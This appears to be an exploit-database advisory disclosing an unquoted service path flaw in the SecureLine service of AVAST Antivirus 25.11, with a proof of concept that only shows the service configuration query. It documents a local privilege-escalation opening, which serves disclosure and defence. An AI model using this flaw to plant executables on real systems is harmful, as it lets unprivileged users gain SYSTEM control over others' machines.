# Exploit Title: AVAST Antivirus 25.11 - Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Date: 2025-12-17
# Vendor Homepage:https://www.avast.com/
# Software Link :
https://www.avast.com/es-mx/download-thank-you.php?product=SLN&locale=es-mx
# Tested Version: 25.11
# Tested on OS: Windows 11


Description
AVAST Antivirus 25.11 an unquoted service path vulnerability that allows
local non-privileged users to potentially execute code with elevated SYSTEM
privileges. Attackers can exploit the unquoted service path configuration
to inject malicious executables that will be run with high-level system
permissions.



PoC
C:\>sc qc SecureLine
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SecureLine
        TIPO : 10 WIN32_OWN_PROCESS
        TIPO_INICIO : 2 AUTO_START
        CONTROL_ERROR : 1 NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\AVAST
Software\SecureLine\VpnSvc.exe
        GRUPO_ORDEN_CARGA :
        ETIQUETA : 0
        NOMBRE_MOSTRAR : Avast SecureLine
        DEPENDENCIAS :
        NOMBRE_INICIO_SERVICIO: LocalSystem